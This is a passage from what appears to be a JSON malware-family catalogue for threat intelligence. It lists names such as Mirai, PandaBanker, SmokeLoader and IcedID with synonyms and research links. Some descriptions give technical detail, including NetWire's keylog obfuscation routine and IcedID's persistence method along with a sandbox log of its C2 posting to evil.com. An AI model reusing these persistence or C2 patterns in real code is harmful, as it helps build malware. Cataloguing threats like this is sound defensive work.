"e8240391-3e3d-4894-ba80-f8e8de8a8222", - "value": "QtBot", - "description": "", - "meta": { - "synonyms": [ - "qtproject" - ], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" - ] - } - }, - { - "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", - "value": "Combos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", - "value": "Sinowal", - "description": "", - "meta": { - "synonyms": [ - "Quarian", - "Mebroot", - "Anserin", - "Theola" - ], - "type": [], - "refs": [ - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", - "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", - "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" - ] - } - }, - { - "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", - "value": "gsecdump", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://attack.mitre.org/wiki/Technique/T1003" - ] - } - }, - { - "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", - "value": "nRansom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/910952333084971008", - "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", - "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" - ] - } - }, - { - "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", - "value": "RedAlert2", - "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", - "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html" - ] - } - }, - { - "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", - "value": "Qadars", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", - "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf", - "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", - "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", - "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", - "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/" - ] - } - }, - { - "uuid": "42fa55e3-e708-4c11-b807-f31573639941", - "value": "Retadup", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" - ] - } - }, - { - "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", - "value": "Unlock92", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/810753660737073153", - "https://twitter.com/bartblaze/status/976188821078462465" - ] - } - }, - { - "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", - "value": "Jimmy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] - } - }, - { - "uuid": "f856a7c7-768e-415f-90f8-80a914c77083", - "value": "X-Agent", - "description": "", - "meta": { - "synonyms": [ - "fysbis", - "splm", - "chopstick" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" - ] - } - }, - { - "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", - "value": "Kronos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", - "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", - "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" - ] - } - }, - { - "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", - "value": "WebC2-Bolid", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "52608ecb-3625-434a-88ef-9806b9b04e61", - "value": "Erebus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" - ] - } - }, - { - "uuid": "d95f0171-8c5c-48ff-a22f-a8c20c196819", - "value": "Mirai", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", - "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", - "https://isc.sans.edu/diary/22786", - "https://github.com/jgamblin/Mirai-Source-Code", - "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/" - ] - } - }, - { - "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", - "value": "PandaBanker", - "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.", - "meta": { - "synonyms": [ - "ZeusPanda" - ], - "type": [], - "refs": [ - "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", - "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", - "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", - "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", - "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", - "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", - "https://www.spamhaus.org/news/article/771/", - "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", - "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", - "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", - "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", - "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", - "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", - "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" - ] - } - }, - { - "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", - "value": "SmokeLoader", - "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", - "meta": { - "synonyms": [ - "Dofoil" - ], - "type": [], - "refs": [ - "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", - "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", - "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/" - ] - } - }, - { - "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", - "value": "Andromeda", - "description": "", - "meta": { - "synonyms": [ - "Gamarue", - "B106-Gamarue", - "B67-SS-Gamarue", - "b66" - ], - "type": [], - "refs": [ - "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", - "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", - "https://blog.avast.com/andromeda-under-the-microscope", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", - "http://blog.morphisec.com/andromeda-tactics-analyzed", - "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", - "http://resources.infosecinstitute.com/andromeda-bot-analysis/", - "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", - "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", - "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", - "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", - "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" - ] - } - }, - { - "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", - "value": "DE Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", - "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users" - ] - } - }, - { - "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", - "value": "CrashOverride", - "description": "", - "meta": { - "synonyms": [ - "Crash", - "Industroyer" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", - "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" - ] - } - }, - { - "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", - "value": "Dyre", - "description": "", - "meta": { - "synonyms": [ - "Dyreza" - ], - "type": [], - "refs": [ - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates" - ] - } - }, - { - "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", - "value": "MaMi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x26.html" - ] - } - }, - { - "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", - "value": "Xtreme RAT", - "description": "", - "meta": { - "synonyms": [ - "ExtRat" - ], - "type": [], - "refs": [ - "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", - "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", - "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", - "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html" - ] - } - }, - { - "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", - "value": "IcedID Downloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" - ] - } - }, - { - "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", - "value": "elf.wellmess", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", - "value": "MalumPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" - ] - } - }, - { - "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", - "value": "Banatrix", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" - ] - } - }, - { - "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", - "value": "UPAS", - "description": "", - "meta": { - "synonyms": [ - "Rombrast" - ], - "type": [], - "refs": [ - "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", - "https://twitter.com/ulexec/status/1005096227741020160", - "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/" - ] - } - }, - { - "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", - "value": "Imminent Monitor RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" - ] - } - }, - { - "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", - "value": "CryptXXXX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] - } - }, - { - "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", - "value": "LatentBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", - "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access", - "http://malware-traffic-analysis.net/2017/04/25/index.html", - "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", - "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/" - ] - } - }, - { - "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", - "value": "PowerDuke", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - ] - } - }, - { - "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", - "value": "Rombertik", - "description": "", - "meta": { - "synonyms": [ - "CarbonGrabber" - ], - "type": [], - "refs": [ - "http://blogs.cisco.com/security/talos/rombertik" - ] - } - }, - { - "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", - "value": "MirageFox", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] - } - }, - { - "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", - "value": "Tempedreve", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", - "value": "IRRat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] - } - }, - { - "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", - "value": "Kuaibu", - "description": "", - "meta": { - "synonyms": [ - "Barys", - "Gofot", - "Kuaibpy" - ], - "type": [], - "refs": [] - } - }, - { - "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", - "value": "Logedrut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - } - }, - { - "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", - "value": "Jager Decryptor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", - "value": "BrutPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" - ] - } - }, - { - "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", - "value": "Joao", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" - ] - } - }, - { - "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", - "value": "EvilGrab", - "description": "", - "meta": { - "synonyms": [ - "Vidgrab" - ], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" - ] - } - }, - { - "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", - "value": "KAgent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", - "value": "GlanceLove", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", - "https://www.ci-project.org/blog/2017/3/4/arid-viper", - "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", - "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", - "https://www.clearskysec.com/glancelove/" - ] - } - }, - { - "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", - "value": "NetWire RC", - "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n", - "meta": { - "synonyms": [ - "Recam" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", - "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", - "https://www.circl.lu/pub/tr-23/" - ] - } - }, - { - "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", - "value": "GetMyPass", - "description": "", - "meta": { - "synonyms": [ - "getmypos" - ], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", - "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", - "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware" - ] - } - }, - { - "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", - "value": "Bella", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/kai5263499/Bella", - "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" - ] - } - }, - { - "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", - "value": "jRAT", - "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", - "meta": { - "synonyms": [ - "Jacksbot" - ], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", - "https://github.com/java-rat", - "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" - ] - } - }, - { - "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", - "value": "Solarbot", - "description": "", - "meta": { - "synonyms": [ - "Napolar" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", - "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" - ] - } - }, - { - "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", - "value": "CoinThief", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] - } - }, - { - "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", - "value": "VM Zeus", - "description": "", - "meta": { - "synonyms": [ - "VMzeus", - "ZeusVM", - "Zberp" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", - "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" - ] - } - }, - { - "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", - "value": "SocksBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" - ] - } - }, - { - "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", - "value": "Emdivi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", - "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", - "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/" - ] - } - }, - { - "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", - "value": "Satan Ransomware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", - "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", - "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" - ] - } - }, - { - "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", - "value": "Microcin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", - "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" - ] - } - }, - { - "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", - "value": "Tapaoux", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" - ] - } - }, - { - "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", - "value": "MysteryBot", - "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" - ] - } - }, - { - "uuid": "9481d7b1-307c-4504-9333-21720b85317b", - "value": "Cohhoc", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" - ] - } - }, - { - "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", - "value": "FakeDGA", - "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).", - "meta": { - "synonyms": [ - "WillExec" - ], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", - "https://github.com/360netlab/DGA/issues/36", - "http://www.freebuf.com/column/153424.html" - ] - } - }, - { - "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", - "value": "IcedID", - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: 